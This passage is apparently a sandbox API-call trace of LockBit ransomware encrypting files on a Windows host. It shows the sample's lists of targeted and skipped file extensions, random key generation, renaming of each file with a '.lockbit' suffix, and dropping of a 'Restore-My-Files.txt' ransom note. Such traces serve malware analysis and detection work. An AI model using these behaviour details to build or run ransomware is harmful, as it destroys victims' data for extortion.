lpString2="BD18210_.WMF") returned 1 [0200.249] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.249] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF") returned=".WMF" [0200.249] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.249] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.249] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.250] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.250] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF.lockbit") returned 79 [0200.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18210_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0200.252] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.252] malloc (_Size=0x40068) returned 0x3df0008 [0200.252] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3148) returned 1 [0200.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.253] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.265] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.265] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.267] free (_Block=0x1fa2ed8) [0200.267] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18210_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.267] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.267] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.267] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea699700, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xea699700, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18211_.WMF", cAlternateFileName="")) returned 1 [0200.267] lstrcmpiW (lpString1=".", lpString2="BD18211_.WMF") returned -1 [0200.267] lstrcmpiW (lpString1="..", lpString2="BD18211_.WMF") returned -1 [0200.267] PathFindExtensionW (pszPath="BD18211_.WMF") returned=".WMF" [0200.267] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.267] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.268] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.268] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18211_.WMF") returned 1 [0200.269] lstrcmpiW (lpString1="ntldr", lpString2="BD18211_.WMF") returned 1 [0200.269] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18211_.WMF") returned 1 [0200.269] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18211_.WMF") returned 1 [0200.269] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18211_.WMF") returned -1 [0200.269] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18211_.WMF") returned 1 [0200.269] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18211_.WMF") returned 1 [0200.269] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.269] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF") returned=".WMF" [0200.269] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.270] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.270] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.271] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.271] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.271] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF.lockbit") returned 79 [0200.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18211_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.272] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.272] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.272] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1848) returned 1 [0200.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.274] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.278] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.278] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.279] free (_Block=0x1fa2ed8) [0200.280] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18211_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.280] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.280] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85941c00, ftCreationTime.dwHighDateTime=0x1bddca6, ftLastAccessTime.dwLowDateTime=0xbcbffbc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x85941c00, ftLastWriteTime.dwHighDateTime=0x1bddca6, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18212_.WMF", cAlternateFileName="")) returned 1 [0200.280] lstrcmpiW (lpString1=".", lpString2="BD18212_.WMF") returned -1 [0200.280] lstrcmpiW (lpString1="..", lpString2="BD18212_.WMF") returned -1 [0200.280] PathFindExtensionW (pszPath="BD18212_.WMF") returned=".WMF" [0200.280] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.280] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.281] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.281] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.282] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18212_.WMF") returned 1 [0200.282] lstrcmpiW (lpString1="ntldr", lpString2="BD18212_.WMF") returned 1 [0200.282] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18212_.WMF") returned 1 [0200.282] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18212_.WMF") returned 1 [0200.282] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18212_.WMF") returned -1 [0200.282] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18212_.WMF") returned 1 [0200.282] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18212_.WMF") returned 1 [0200.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF") returned=".WMF" [0200.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.283] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.283] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.284] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.284] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF.lockbit") returned 79 [0200.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18212_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0200.285] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.285] malloc (_Size=0x40068) returned 0x3d70450 [0200.285] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=15708) returned 1 [0200.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0200.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0200.287] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0200.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.293] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.293] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.295] free (_Block=0x1fa2ed8) [0200.295] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18212_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.295] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.295] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1638d100, 